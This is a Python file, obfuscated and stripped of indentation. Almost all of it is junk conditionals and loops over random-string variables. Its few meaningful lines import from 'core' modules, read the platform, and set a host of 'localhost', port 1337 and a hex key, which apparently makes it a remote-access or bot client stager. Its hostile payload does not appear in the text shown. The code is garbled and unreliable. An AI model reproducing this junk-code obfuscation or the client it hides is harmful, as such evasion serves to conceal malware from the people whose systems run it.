if nyOxEJxDBPQJwMGiHzMDTwszQGFAFuJDmBGuSOJPQizGrJvHJGPoxIwCPGuIDji in zeVHIhvOkDCRIHiRyjhSIRQRcmnADSXGYICpFyPjklyIJHzVqGStzICFOzQRzzE:
nyOxEJxDBPQJwMGiHzMDTwszQGFAFuJDmBGuSOJPQizGrJvHJGPoxIwCPGuIDji = xHpizJHFQvvTJRQTSJPQxSHDGCtOJSvISsmPnFzYvGHHKNSIvsqSrRCSQotmkMN
if zeVHIhvOkDCRIHiRyjhSIRQRcmnADSXGYICpFyPjklyIJHzVqGStzICFOzQRzzE in FGyqEbELuzvTeFztxwDvwmDPtBpmBtDGGIRtGrBRBSEoSBJGNOECVItIOytyQfH:
zeVHIhvOkDCRIHiRyjhSIRQRcmnADSXGYICpFyPjklyIJHzVqGStzICFOzQRzzE = HTEQmsDDCtyDxCuCAISEUHGpFzIDwSqOesfAEtzysVgBpJEMFpCDqHGkwnBwxB
elif zeVHIhvOkDCRIHiRyjhSIRQRcmnADSXGYICpFyPjklyIJHzVqGStzICFOzQRzzE in nyOxEJxDBPQJwMGiHzMDTwszQGFAFuJDmBGuSOJPQizGrJvHJGPoxIwCPGuIDji:
FGyqEbELuzvTeFztxwDvwmDPtBpmBtDGGIRtGrBRBSEoSBJGNOECVItIOytyQfH = zeVHIhvOkDCRIHiRyjhSIRQRcmnADSXGYICpFyPjklyIJHzVqGStzICFOzQRzzE
if FGyqEbELuzvTeFztxwDvwmDPtBpmBtDGGIRtGrBRBSEoSBJGNOECVItIOytyQfH in zeVHIhvOkDCRIHiRyjhSIRQRcmnADSXGYICpFyPjklyIJHzVqGStzICFOzQRzzE:
zeVHIhvOkDCRIHiRyjhSIRQRcmnADSXGYICpFyPjklyIJHzVqGStzICFOzQRzzE = xHpizJHFQvvTJRQTSJPQxSHDGCtOJSvISsmPnFzYvGHHKNSIvsqSrRCSQotmkMN
from core.GUHQyNzYwxRHRrtOBrXpxJsOZwCyrSGeJTPwVlAmmpwxqPIASTSRPRISEGtuyIP import GuHDlyvuyMYuBAOtBAoPLYEGnaoPxOQUqfGYkfnEGXzwIHOCMmuuwFjwmqQQFVu
IOEvzClwyRBCBCQeJgtqCoVBPIvnFNNBiEODtqzqxlIBMZqamFEfRsiOXDHxtPw = 'UQsvBxSGqyPtYoEHCNmCJcaePvOCHPkMJvHEztSJguuJIIuXJwOhBYHCUCRZwSl'
SFuSAQSzrIZQJmyLOFFUhnyzIxEGsiHOANGQPtkuUwvPCDEGtJTqCPODHqGMnHI = 'xCzFNtvvRYiqwfDAtwvmSElAOtJCoFSETpGMIHEJrWPiJCOCtIuSOEJHgoCmrIv'
DvUuJFClABGCETRmVGFOIGpHJERjkzrYHSNEuAeTFGCGxBJylztDEvSBRzMxclL = 'CDkozkqNQAymGCEzzQSwvSHPQwOItyDUIHDewZsvIZwCDzGDYgtmIMJjsAqvHEf'
GtAFntGyQBJQzyRJoOACIDIiAIGtRyEwpwtnDypxAyvTEpuPAjYCNsCHIutDmUx = 'YPynqCIeRqPCCRCmuxoCrAnYBmEHsBBuHFOSSJHrQYvrrCzQJtevGRQCEIFOzBn'
if SFuSAQSzrIZQJmyLOFFUhnyzIxEGsiHOANGQPtkuUwvPCDEGtJTqCPODHqGMnHI == IOEvzClwyRBCBCQeJgtqCoVBPIvnFNNBiEODtqzqxlIBMZqamFEfRsiOXDHxtPw:
for IOEvzClwyRBCBCQeJgtqCoVBPIvnFNNBiEODtqzqxlIBMZqamFEfRsiOXDHxtPw in SFuSAQSzrIZQJmyLOFFUhnyzIxEGsiHOANGQPtkuUwvPCDEGtJTqCPODHqGMnHI:
if SFuSAQSzrIZQJmyLOFFUhnyzIxEGsiHOANGQPtkuUwvPCDEGtJTqCPODHqGMnHI == SFuSAQSzrIZQJmyLOFFUhnyzIxEGsiHOANGQPtkuUwvPCDEGtJTqCPODHqGMnHI:
DvUuJFClABGCETRmVGFOIGpHJERjkzrYHSNEuAeTFGCGxBJylztDEvSBRzMxclL = 'GtAFntGyQBJQzyRJoOACIDIiAIGtRyEwpwtnDypxAyvTEpuPAjYCNsCHIutDmUx'
elif DvUuJFClABGCETRmVGFOIGpHJERjkzrYHSNEuAeTFGCGxBJylztDEvSBRzMxclL == GtAFntGyQBJQzyRJoOACIDIiAIGtRyEwpwtnDypxAyvTEpuPAjYCNsCHIutDmUx:
GtAFntGyQBJQzyRJoOACIDIiAIGtRyEwpwtnDypxAyvTEpuPAjYCNsCHIutDmUx = IOEvzClwyRBCBCQeJgtqCoVBPIvnFNNBiEODtqzqxlIBMZqamFEfRsiOXDHxtPw
else:
IOEvzClwyRBCBCQeJgtqCoVBPIvnFNNBiEODtqzqxlIBMZqamFEfRsiOXDHxtPw = SFuSAQSzrIZQJmyLOFFUhnyzIxEGsiHOANGQPtkuUwvPCDEGtJTqCPODHqGMnHI
elif DvUuJFClABGCETRmVGFOIGpHJERjkzrYHSNEuAeTFGCGxBJylztDEvSBRzMxclL == DvUuJFClABGCETRmVGFOIGpHJERjkzrYHSNEuAeTFGCGxBJylztDEvSBRzMxclL:
for DvUuJFClABGCETRmVGFOIGpHJERjkzrYHSNEuAeTFGCGxBJylztDEvSBRzMxclL in SFuSAQSzrIZQJmyLOFFUhnyzIxEGsiHOANGQPtkuUwvPCDEGtJTqCPODHqGMnHI:
if GtAFntGyQBJQzyRJoOACIDIiAIGtRyEwpwtnDypxAyvTEpuPAjYCNsCHIutDmUx == SFuSAQSzrIZQJmyLOFFUhnyzIxEGsiHOANGQPtkuUwvPCDEGtJTqCPODHqGMnHI:
DvUuJFClABGCETRmVGFOIGpHJERjkzrYHSNEuAeTFGCGxBJylztDEvSBRzMxclL = 'GtAFntGyQBJQzyRJoOACIDIiAIGtRyEwpwtnDypxAyvTEpuPAjYCNsCHIutDmUx'
elif DvUuJFClABGCETRmVGFOIGpHJERjkzrYHSNEuAeTFGCGxBJylztDEvSBRzMxclL == GtAFntGyQBJQzyRJoOACIDIiAIGtRyEwpwtnDypxAyvTEpuPAjYCNsCHIutDmUx:
GtAFntGyQBJQzyRJoOACIDIiAIGtRyEwpwtnDypxAyvTEpuPAjYCNsCHIutDmUx = IOEvzClwyRBCBCQeJgtqCoVBPIvnFNNBiEODtqzqxlIBMZqamFEfRsiOXDHxtPw
else:
IOEvzClwyRBCBCQeJgtqCoVBPIvnFNNBiEODtqzqxlIBMZqamFEfRsiOXDHxtPw = SFuSAQSzrIZQJmyLOFFUhnyzIxEGsiHOANGQPtkuUwvPCDEGtJTqCPODHqGMnHI
for DvUuJFClABGCETRmVGFOIGpHJERjkzrYHSNEuAeTFGCGxBJylztDEvSBRzMxclL in SFuSAQSzrIZQJmyLOFFUhnyzIxEGsiHOANGQPtkuUwvPCDEGtJTqCPODHqGMnHI:
if GtAFntGyQBJQzyRJoOACIDIiAIGtRyEwpwtnDypxAyvTEpuPAjYCNsCHIutDmUx == SFuSAQSzrIZQJmyLOFFUhnyzIxEGsiHOANGQPtkuUwvPCDEGtJTqCPODHqGMnHI:
DvUuJFClABGCETRmVGFOIGpHJERjkzrYHSNEuAeTFGCGxBJylztDEvSBRzMxclL = 'GtAFntGyQBJQzyRJoOACIDIiAIGtRyEwpwtnDypxAyvTEpuPAjYCNsCHIutDmUx'
elif DvUuJFClABGCETRmVGFOIGpHJERjkzrYHSNEuAeTFGCGxBJylztDEvSBRzMxclL == GtAFntGyQBJQzyRJoOACIDIiAIGtRyEwpwtnDypxAyvTEpuPAjYCNsCHIutDmUx:
GtAFntGyQBJQzyRJoOACIDIiAIGtRyEwpwtnDypxAyvTEpuPAjYCNsCHIutDmUx = IOEvzClwyRBCBCQeJgtqCoVBPIvnFNNBiEODtqzqxlIBMZqamFEfRsiOXDHxtPw
else:
IOEvzClwyRBCBCQeJgtqCoVBPIvnFNNBiEODtqzqxlIBMZqamFEfRsiOXDHxtPw = GtAFntGyQBJQzyRJoOACIDIiAIGtRyEwpwtnDypxAyvTEpuPAjYCNsCHIutDmUx
else:
IOEvzClwyRBCBCQeJgtqCoVBPIvnFNNBiEODtqzqxlIBMZqamFEfRsiOXDHxtPw = SFuSAQSzrIZQJmyLOFFUhnyzIxEGsiHOANGQPtkuUwvPCDEGtJTqCPODHqGMnHI
from core.zMJIDSQBjssyEayGxDrxJGHzInFeSJvxzsGGSMSsCIHSEyiEAwPOFiAvyOoavMB import BwtroWhMwUAJNCIxRHzhDBTSCJpUovQxSozAwFoJQVyMQrvQGDCJOCEBlQCVMfA, GDksjjtSttQJGqJCSHBpJxAJSRDrJIDqHDEJwJyFDxQMvxxSnWJyzVqRauBigxx
try:
luiAasqRPAqFAbHHMGxcFsJHnkwIQLzvAkEGQBAOAsSgkuCONDExjJkGOtDtFDG = 'uHPeBmEEnIPGEceIAQOsDEFFtznzoDBISIIINyGjISPBLHGGxSHAsDVrByIHxyQ'
nDRswIKkBFHAEPyEYzSyySEumHZGoHGwGovJvsEvuuDYINjiFlRRPHEEzHESYFZ = 'JHnMUIJJzDAoOsXvEokGyCvBEtBIRXrCvBtISdhHHSNmprJrPPtnHxvlITPAjw'
OxzIIHESTuPjPQLyJDzqORFAOAQFUIqSPvQBEmxGsAXJrJSQVQGvPqzLEFxwxmX = 'OWgDxmBmrpzGvpHvuASSqtEbGywwmSktXzQGGIxnQQxgOmCmrtxzFDXCApEJLfN'
qESSVPqFIOtBHtxGJssCIKuAzRueqoawFHBzwuAiMvRICEBfQYRxxkGrSjAAsEr = 'RmBujycyGGlrBhsyFzTRmQjGSqENRSpTBsUIJCJvRDZvizFFztAxJRuPjvJoyPx'
vhRiCGyAmGwiOGMGVCMLDjvJzQqFzFCtICsDAXSjuxNJrQoaYCGAITtmfBHsEBx = 'QrzFAByGkCFESIqyAPInSSvGGKZvDIVIsHuJeDEIBqkwPBJBtwPGaADxRWCwRJz'
DxwIQPONOSIHtODEIYnvOSSErtyIEwDyvAprVwuSnDvCzsvHGICFJxTJBytwRWr = 'POSmSiAvABGOYUXHQCbIMkYFOEBXIHGyIOPPjJHeHWHUyyuMirDSGUGIBDJDJEA'
GSwRDztzstSzHrHFvMCEBvGGqCNgWwOJkQzSBHIGvxvSGHGBCtEPBhSGumyuCIx = [
'uHPeBmEEnIPGEceIAQOsDEFFtznzoDBISIIINyGjISPBLHGGxSHAsDVrByIHxyQ',
'OWgDxmBmrpzGvpHvuASSqtEbGywwmSktXzQGGIxnQQxgOmCmrtxzFDXCApEJLfN',
'QrzFAByGkCFESIqyAPInSSvGGKZvDIVIsHuJeDEIBqkwPBJBtwPGaADxRWCwRJz',
'uFFuUnxDtFEyzwmPMfXUvDksUDwQyqzwSITHJBRrFQjvvYRupIFEJeAORGnOBDB'
]
for luiAasqRPAqFAbHHMGxcFsJHnkwIQLzvAkEGQBAOAsSgkuCONDExjJkGOtDtFDG in DxwIQPONOSIHtODEIYnvOSSErtyIEwDyvAprVwuSnDvCzsvHGICFJxTJBytwRWr:
for nDRswIKkBFHAEPyEYzSyySEumHZGoHGwGovJvsEvuuDYINjiFlRRPHEEzHESYFZ in OxzIIHESTuPjPQLyJDzqORFAOAQFUIqSPvQBEmxGsAXJrJSQVQGvPqzLEFxwxmX:
if qESSVPqFIOtBHtxGJssCIKuAzRueqoawFHBzwuAiMvRICEBfQYRxxkGrSjAAsEr == vhRiCGyAmGwiOGMGVCMLDjvJzQqFzFCtICsDAXSjuxNJrQoaYCGAITtmfBHsEBx:
nDRswIKkBFHAEPyEYzSyySEumHZGoHGwGovJvsEvuuDYINjiFlRRPHEEzHESYFZ = luiAasqRPAqFAbHHMGxcFsJHnkwIQLzvAkEGQBAOAsSgkuCONDExjJkGOtDtFDG
elif vhRiCGyAmGwiOGMGVCMLDjvJzQqFzFCtICsDAXSjuxNJrQoaYCGAITtmfBHsEBx == nDRswIKkBFHAEPyEYzSyySEumHZGoHGwGovJvsEvuuDYINjiFlRRPHEEzHESYFZ:
nDRswIKkBFHAEPyEYzSyySEumHZGoHGwGovJvsEvuuDYINjiFlRRPHEEzHESYFZ = DxwIQPONOSIHtODEIYnvOSSErtyIEwDyvAprVwuSnDvCzsvHGICFJxTJBytwRWr
else:
vhRiCGyAmGwiOGMGVCMLDjvJzQqFzFCtICsDAXSjuxNJrQoaYCGAITtmfBHsEBx = DxwIQPONOSIHtODEIYnvOSSErtyIEwDyvAprVwuSnDvCzsvHGICFJxTJBytwRWr
for nDRswIKkBFHAEPyEYzSyySEumHZGoHGwGovJvsEvuuDYINjiFlRRPHEEzHESYFZ in GSwRDztzstSzHrHFvMCEBvGGqCNgWwOJkQzSBHIGvxvSGHGBCtEPBhSGumyuCIx:
OxzIIHESTuPjPQLyJDzqORFAOAQFUIqSPvQBEmxGsAXJrJSQVQGvPqzLEFxwxmX = nDRswIKkBFHAEPyEYzSyySEumHZGoHGwGovJvsEvuuDYINjiFlRRPHEEzHESYFZ
except Exception:
pass
except ImportError as GRIpvHwJmDsXvKISzSHxOSmrRBkeQuFxFGmJzDJTECGqsYCSyrolqxAeSyHYvuR:
vjOHArFGWySSwRfPAPrytxyjByRHGRCSWJxFzPtpOtTAZoHijyEDBQJOJqSFwkG = 'llzLJWoQkGzyxyEMTAiGFBrYPJVeyfSyyFHsxBnoulHsqHuwvwpLwUNGIJHPEtP'
vrClsRvNzGuStQvoRvWEHRRTJpCPPwHHXyEIJuCoQowFpzOxwSnmGuWqSpzoIJT = 'tGwOEAyvIEJRHGtGfQHRyBSIIwGNezvJFHZOFtuFIswBlzqRvCQrvRSAMpnttEQ'
GwZUHGWqGPzOyGqsyYGWMGHOWDvpJHqFISJOSQObRyJGBuyAJPzSsUqoOmQVFRP = 'BSILrwBEqFQkIJQnDAIZXFptJoRqySDEAJIjJxyIvASQcCGvycjCFJwwQuINzJD'
wIFvQYsJFSRvnvAzovVFrSuAeSuJEPRJzHItlxqUHDCgvuyXSxlvyzUPJYIwHLL = 'jHBSHySpBDFYENyuHEAEaSCAfqupwwueyqnrFBDhpJvENIHJFnBAsAHWTvQXhuR'
UPOuloDFFbszKzZzQXCwDjMmOyJSuJRQAnIIFBBpODrHmOFywqUFICXxOAqHIDE = 'sEJUWOIjxCAmPgznGsySvJGRMabExBodHSEpYAibNlHGtizyCzEvDySBMynDIPJ'
if vjOHArFGWySSwRfPAPrytxyjByRHGRCSWJxFzPtpOtTAZoHijyEDBQJOJqSFwkG in vrClsRvNzGuStQvoRvWEHRRTJpCPPwHHXyEIJuCoQowFpzOxwSnmGuWqSpzoIJT:
vjOHArFGWySSwRfPAPrytxyjByRHGRCSWJxFzPtpOtTAZoHijyEDBQJOJqSFwkG = UPOuloDFFbszKzZzQXCwDjMmOyJSuJRQAnIIFBBpODrHmOFywqUFICXxOAqHIDE
if vrClsRvNzGuStQvoRvWEHRRTJpCPPwHHXyEIJuCoQowFpzOxwSnmGuWqSpzoIJT in GwZUHGWqGPzOyGqsyYGWMGHOWDvpJHqFISJOSQObRyJGBuyAJPzSsUqoOmQVFRP:
vrClsRvNzGuStQvoRvWEHRRTJpCPPwHHXyEIJuCoQowFpzOxwSnmGuWqSpzoIJT = wIFvQYsJFSRvnvAzovVFrSuAeSuJEPRJzHItlxqUHDCgvuyXSxlvyzUPJYIwHLL
elif vrClsRvNzGuStQvoRvWEHRRTJpCPPwHHXyEIJuCoQowFpzOxwSnmGuWqSpzoIJT in vjOHArFGWySSwRfPAPrytxyjByRHGRCSWJxFzPtpOtTAZoHijyEDBQJOJqSFwkG:
GwZUHGWqGPzOyGqsyYGWMGHOWDvpJHqFISJOSQObRyJGBuyAJPzSsUqoOmQVFRP = vrClsRvNzGuStQvoRvWEHRRTJpCPPwHHXyEIJuCoQowFpzOxwSnmGuWqSpzoIJT
if GwZUHGWqGPzOyGqsyYGWMGHOWDvpJHqFISJOSQObRyJGBuyAJPzSsUqoOmQVFRP in vrClsRvNzGuStQvoRvWEHRRTJpCPPwHHXyEIJuCoQowFpzOxwSnmGuWqSpzoIJT:
vrClsRvNzGuStQvoRvWEHRRTJpCPPwHHXyEIJuCoQowFpzOxwSnmGuWqSpzoIJT = UPOuloDFFbszKzZzQXCwDjMmOyJSuJRQAnIIFBBpODrHmOFywqUFICXxOAqHIDE
print(GRIpvHwJmDsXvKISzSHxOSmrRBkeQuFxFGmJzDJTECGqsYCSyrolqxAeSyHYvuR)
sys.exit(0)
nwsJDSFGtvBSQFxsVSBNEBFkDIeEvfqNEHJStBDIEFuGcCSvRuFGFBOGTCtIxyJ = sys.platform
QGRQRwouEOazIEqAwGHEGHwzFzExIJODGtGpawWzmRHyEGEJiRkzAQCxCkGxxDO = 'GSFWuEAGpAwEklfuDJOHKOwEUzwHywxQAwGyjQIvErPvEwHzmzPBIoEywBPxDnD'
JFfEzwESmwwNVAGxznDvvHJvSFEkQVtJEzHBzJRuvqJuPyEGHeOIJqToJJqLxQD = 'GDhDBJJCweBDssXFLvAuESSEyxRyhkDwpCuXRSWJqnGvMTAYRsTGRhOIEuGxPSu'
CWMvSpGxICuPwuCEkNlXpAHRAQGYOEUrrJGzFkImNADEgzFEwCWAJzvzrIEiCmG = 'IvyEABRuRwIPLBAqCquBCHnHkkIBdYDmIrCDDTpPFAxAQltxusiTmuQERlPtCEz'
ASDwRzSXVHoyOyQFmSEeAASPDsyRGHfCSpSCEHuJVIwxgwIDSvESHnKMSQmxnOC = 'wGyHInFlnxGxXIhGZPEJSyPEJrDoNpVzANsPIyGrvGyHBGNJIAKBDBPZGHrrqHI'
xTyYtiMJtuREkELjQzyQRxJtOJQHOrQzCzxCIGnQxQhfFyGUDrUgEOHwApzYCJB = 'ErBvASsGScEAQreHlMJFQJlDDmqDGsJOrHwsJVQgXSXiQSFGPHTNMGpieymHoCy'
xRrHNlADCTwxyEEHGCStgInoJvHCwUBDSURxkYByvIICujnJWUIqRNHvRnzsqPW = 'vzNxwardqUroBkGVSRCupivMiFxsBzqSgSRvsrqGyyGDrGASQUGiJHCxClIJQqR'
if QGRQRwouEOazIEqAwGHEGHwzFzExIJODGtGpawWzmRHyEGEJiRkzAQCxCkGxxDO != ASDwRzSXVHoyOyQFmSEeAASPDsyRGHfCSpSCEHuJVIwxgwIDSvESHnKMSQmxnOC:
JFfEzwESmwwNVAGxznDvvHJvSFEkQVtJEzHBzJRuvqJuPyEGHeOIJqToJJqLxQD = CWMvSpGxICuPwuCEkNlXpAHRAQGYOEUrrJGzFkImNADEgzFEwCWAJzvzrIEiCmG
for xRrHNlADCTwxyEEHGCStgInoJvHCwUBDSURxkYByvIICujnJWUIqRNHvRnzsqPW in ASDwRzSXVHoyOyQFmSEeAASPDsyRGHfCSpSCEHuJVIwxgwIDSvESHnKMSQmxnOC:
if xRrHNlADCTwxyEEHGCStgInoJvHCwUBDSURxkYByvIICujnJWUIqRNHvRnzsqPW != CWMvSpGxICuPwuCEkNlXpAHRAQGYOEUrrJGzFkImNADEgzFEwCWAJzvzrIEiCmG:
JFfEzwESmwwNVAGxznDvvHJvSFEkQVtJEzHBzJRuvqJuPyEGHeOIJqToJJqLxQD = JFfEzwESmwwNVAGxznDvvHJvSFEkQVtJEzHBzJRuvqJuPyEGHeOIJqToJJqLxQD
else:
xTyYtiMJtuREkELjQzyQRxJtOJQHOrQzCzxCIGnQxQhfFyGUDrUgEOHwApzYCJB = QGRQRwouEOazIEqAwGHEGHwzFzExIJODGtGpawWzmRHyEGEJiRkzAQCxCkGxxDO
else:
CWMvSpGxICuPwuCEkNlXpAHRAQGYOEUrrJGzFkImNADEgzFEwCWAJzvzrIEiCmG = QGRQRwouEOazIEqAwGHEGHwzFzExIJODGtGpawWzmRHyEGEJiRkzAQCxCkGxxDO
QGRQRwouEOazIEqAwGHEGHwzFzExIJODGtGpawWzmRHyEGEJiRkzAQCxCkGxxDO = xTyYtiMJtuREkELjQzyQRxJtOJQHOrQzCzxCIGnQxQhfFyGUDrUgEOHwApzYCJB
if CWMvSpGxICuPwuCEkNlXpAHRAQGYOEUrrJGzFkImNADEgzFEwCWAJzvzrIEiCmG == QGRQRwouEOazIEqAwGHEGHwzFzExIJODGtGpawWzmRHyEGEJiRkzAQCxCkGxxDO:
for xRrHNlADCTwxyEEHGCStgInoJvHCwUBDSURxkYByvIICujnJWUIqRNHvRnzsqPW in QGRQRwouEOazIEqAwGHEGHwzFzExIJODGtGpawWzmRHyEGEJiRkzAQCxCkGxxDO:
if xRrHNlADCTwxyEEHGCStgInoJvHCwUBDSURxkYByvIICujnJWUIqRNHvRnzsqPW == CWMvSpGxICuPwuCEkNlXpAHRAQGYOEUrrJGzFkImNADEgzFEwCWAJzvzrIEiCmG:
CWMvSpGxICuPwuCEkNlXpAHRAQGYOEUrrJGzFkImNADEgzFEwCWAJzvzrIEiCmG = QGRQRwouEOazIEqAwGHEGHwzFzExIJODGtGpawWzmRHyEGEJiRkzAQCxCkGxxDO
else:
CWMvSpGxICuPwuCEkNlXpAHRAQGYOEUrrJGzFkImNADEgzFEwCWAJzvzrIEiCmG = xTyYtiMJtuREkELjQzyQRxJtOJQHOrQzCzxCIGnQxQhfFyGUDrUgEOHwApzYCJB
CIqEQCPyumOPExHuxRHSGBFHzROHQjEPDCrLBtwvGPEFEzpyGLZoeyqvzPRGAHC = 'localhost'
RwTBlAQJirnnuBSxAooWFAEHJqIIPSZPAyBIJrrBQAIrYgbGoBQSgDqRIyyktGG = 'XPnqyABHjboPmIHyJynQFQEExIGMwvRjrBBEtRlHklTFoIAyAPISuzEpJHFBvnZ'
uDYJBloFYIFrEqxyGnBvIxGRBzCxHIzNJZjorRRIyCJErBnJJsDPLFxjvSSJINX = 'hDmyQJfnfPLQsvHYrBwJHnBQKyQwRrQDYJJFEEiBAxrDSDTmBRLwjvDFAzstIzF'
hkRFsqzjsQOuFoqEGACBhIRmNoutXCrtwPwISRFlyHEEPQxCqOfAJHlEoGeFJFE = 'JQtPSGuYgrxqIvOGxCGGcFCrFgFPRpXRzuHowHPHCyzGxBHSIMtwrEDBIDZzBRu'
qOyyuJtJFGUoNFCQOJtCPgQUfQmCCGIqrHoRWAvwHRStusEexJBEuBHQIMsRRxm = 'pFRPrxMyBHwIsyexesMNaHoqyHPWonFpSBIAJGtDjFCFkAHESCHrHGuTiHsGgEB'
ujoNuzDUFyPSGsSGeIABHxIeyItFUUGyIZGJEwPIEPBHAAxSGiDGJEGOyRSIRhn = 'hSYYHPnSggRzIREQDQhRFEYQjAJEnIEBFtnJCRNwEJSnJRRvwGkBzXgcADdNkHO'
rFegFIBHlIoQRFXGsOEGxIDvDzwkHiEAJLRmCOpSECGOAQQLLQUvCUFzmkHRGJv = 'qCFzkFGQiBAYDJmvrHBCyRlrxlDwexJIPQtxRuIBFRDpIozeQIRDwHpJRxJIHmH'
if hkRFsqzjsQOuFoqEGACBhIRmNoutXCrtwPwISRFlyHEEPQxCqOfAJHlEoGeFJFE == qOyyuJtJFGUoNFCQOJtCPgQUfQmCCGIqrHoRWAvwHRStusEexJBEuBHQIMsRRxm:
for rFegFIBHlIoQRFXGsOEGxIDvDzwkHiEAJLRmCOpSECGOAQQLLQUvCUFzmkHRGJv in ujoNuzDUFyPSGsSGeIABHxIeyItFUUGyIZGJEwPIEPBHAAxSGiDGJEGOyRSIRhn:
if rFegFIBHlIoQRFXGsOEGxIDvDzwkHiEAJLRmCOpSECGOAQQLLQUvCUFzmkHRGJv == qOyyuJtJFGUoNFCQOJtCPgQUfQmCCGIqrHoRWAvwHRStusEexJBEuBHQIMsRRxm:
ujoNuzDUFyPSGsSGeIABHxIeyItFUUGyIZGJEwPIEPBHAAxSGiDGJEGOyRSIRhn = RwTBlAQJirnnuBSxAooWFAEHJqIIPSZPAyBIJrrBQAIrYgbGoBQSgDqRIyyktGG
else:
qOyyuJtJFGUoNFCQOJtCPgQUfQmCCGIqrHoRWAvwHRStusEexJBEuBHQIMsRRxm = uDYJBloFYIFrEqxyGnBvIxGRBzCxHIzNJZjorRRIyCJErBnJJsDPLFxjvSSJINX
fnQOIFPteJmyFvhQGBEIESHBAwyZCyBwBCEwIvrwpHikvJwsynfTFDREwwBAEGJ = 1337
CAYEmIEyItnVCAnEzIeMvvRJQBGEwShTGytHGiTiIXBxJBxHGIDEOuRwGgKlsJT = 'EJCytTKGBPTbFAJGLRviQRRRBBJeyJGzSnRRBzDFAYHAwDSEExxGBHXyQEHFyzw'
sHoFJJGxuIROSREMRoGoJWVUlGCJPwVuwGBInyqAsFIwFxzQlNRsFDNDyFSPIt = 'IOBSEEJLxPuJSpINpGHSqFuRGDWFHMbnJXDnGvMYGRymPTAGHHQQGNHsEhGozd'
ERknxPGwQWmUBlQSjpqQtyPuvIlxifwDtrBxDSjJqNnxACSXlysFnIsJXvAOJfs = 'PFzvzDsYHMIoQGSDBsPqGADmJxAQRysqovvzRzQkjZkZqRusPBMPzvDxEEyEvxn'
if CAYEmIEyItnVCAnEzIeMvvRJQBGEwShTGytHGiTiIXBxJBxHGIDEOuRwGgKlsJT == sHoFJJGxuIROSREMRoGoJWVUlGCJPwVuwGBInyqAsFIwFxzQlNRsFDNDyFSPIt:
ERknxPGwQWmUBlQSjpqQtyPuvIlxifwDtrBxDSjJqNnxACSXlysFnIsJXvAOJfs = 'PFzvzDsYHMIoQGSDBsPqGADmJxAQRysqovvzRzQkjZkZqRusPBMPzvDxEEyEvxn'
ERknxPGwQWmUBlQSjpqQtyPuvIlxifwDtrBxDSjJqNnxACSXlysFnIsJXvAOJfs = CAYEmIEyItnVCAnEzIeMvvRJQBGEwShTGytHGiTiIXBxJBxHGIDEOuRwGgKlsJT
else:
ERknxPGwQWmUBlQSjpqQtyPuvIlxifwDtrBxDSjJqNnxACSXlysFnIsJXvAOJfs = 'PFzvzDsYHMIoQGSDBsPqGADmJxAQRysqovvzRzQkjZkZqRusPBMPzvDxEEyEvxn'
ERknxPGwQWmUBlQSjpqQtyPuvIlxifwDtrBxDSjJqNnxACSXlysFnIsJXvAOJfs = 'EJCytTKGBPTbFAJGLRviQRRRBBJeyJGzSnRRBzDFAYHAwDSEExxGBHXyQEHFyzw'
CFRGQCPCzURSYHUgHlEFsBSnFqsWRJFJCLuvAijkNAfyFExtqWWAAuIDRGEQPsj = 'b14ce95fa4c33ac2803782d18341869f'
try:
ymVTyNXPvwmnSGzusCGFwERDIlGPFQVISdvHuYRMJJQOoDIImntGCHPElvRpsYw = 'cOLwQFnGgBRAQmBIPQFyLNqcYIIWTZbfGYvOoPkDBRmORsGSCGwHHELzWETyyxG'
CFrxCBjHxSvGFuxPiAHElExIFPJFCEGzJHsmEATzyarDSIcZSNPHmRvPIyOuGCG = 'CElERpyFSPuaRGkrCjStJgQQQtuoPCjCCSMrGmjFQZSGICVpBJVDHCqyOEDCOQE'
QMVRDGssAEEYnPztpmEGJSBiAxpyBSDteQYBNQBDwHZnqRHkiGPEpJHzHQRaxT = 'GFJYPDSPICOxBUooJuEwvvHokDvDvgRFgsJGJBmyJkPJRFRIGCRgxtGHBhIQzIU'
wwGopDIoJRByVEMiBJHPvnkAHoRFHAZotOCEfxJBInxNRARJCUIXNoHlHrjRtyk = 'JBWBwJzDRqsEHuAqepJGIxDHZsPDPRpXiFHDBnHBsvzJPRHVSJAHEzsqJPQHQBx'
QtevNgSQHCJECEmGvmqaAJzNIukRvoqSFoSGvszXItRSxKBnFpoHFIDiGBHJNyr = 'AQFwRCxOQyDzBRPCJwJtquVQkIywjwJpCDugfVQwCSAzwvlDpCtynDBukAIUFyQ'
zluSGBHADmBuCxAyxMDBRHspUlHDmJuGPGpCSOEoGBQGeISLwsQvrPlBzzGuFgn = 'upyQIBBVSAnJraVqYzWvJGygDAuQkRVOIumwjGBHHmSJjAwHsqvRRICoMoRSzDi'
FXNwZiyJWIesHsmiHJzjGDQwXHvGDEQwQEoRtHPDmsQysXxHGOtOFggNrYVwIus = [
'cOLwQFnGgBRAQmBIPQFyLNqcYIIWTZbfGYvOoPkDBRmORsGSCGwHHELzWETyyxG',
'GFJYPDSPICOxBUooJuEwvvHokDvDvgRFgsJGJBmyJkPJRFRIGCRgxtGHBhIQzIU',
'AQFwRCxOQyDzBRPCJwJtquVQkIywjwJpCDugfVQwCSAzwvlDpCtynDBukAIUFyQ',
'SztutxvJpQPSSAtDNrxDfTwWvHESskJxAhJBIeFJOCODlGoQFxPADJRzUMwmDyr'
]
for ymVTyNXPvwmnSGzusCGFwERDIlGPFQVISdvHuYRMJJQOoDIImntGCHPElvRpsYw in zluSGBHADmBuCxAyxMDBRHspUlHDmJuGPGpCSOEoGBQGeISLwsQvrPlBzzGuFgn:
for CFrxCBjHxSvGFuxPiAHElExIFPJFCEGzJHsmEATzyarDSIcZSNPHmRvPIyOuGCG in QMVRDGssAEEYnPztpmEGJSBiAxpyBSDteQYBNQBDwHZnqRHkiGPEpJHzHQRaxT:
if wwGopDIoJRByVEMiBJHPvnkAHoRFHAZotOCEfxJBInxNRARJCUIXNoHlHrjRtyk == QtevNgSQHCJECEmGvmqaAJzNIukRvoqSFoSGvszXItRSxKBnFpoHFIDiGBHJNyr:
CFrxCBjHxSvGFuxPiAHElExIFPJFCEGzJHsmEATzyarDSIcZSNPHmRvPIyOuGCG = ymVTyNXPvwmnSGzusCGFwERDIlGPFQVISdvHuYRMJJQOoDIImntGCHPElvRpsYw
elif QtevNgSQHCJECEmGvmqaAJzNIukRvoqSFoSGvszXItRSxKBnFpoHFIDiGBHJNyr == CFrxCBjHxSvGFuxPiAHElExIFPJFCEGzJHsmEATzyarDSIcZSNPHmRvPIyOuGCG:
CFrxCBjHxSvGFuxPiAHElExIFPJFCEGzJHsmEATzyarDSIcZSNPHmRvPIyOuGCG = zluSGBHADmBuCxAyxMDBRHspUlHDmJuGPGpCSOEoGBQGeISLwsQvrPlBzzGuFgn
else:
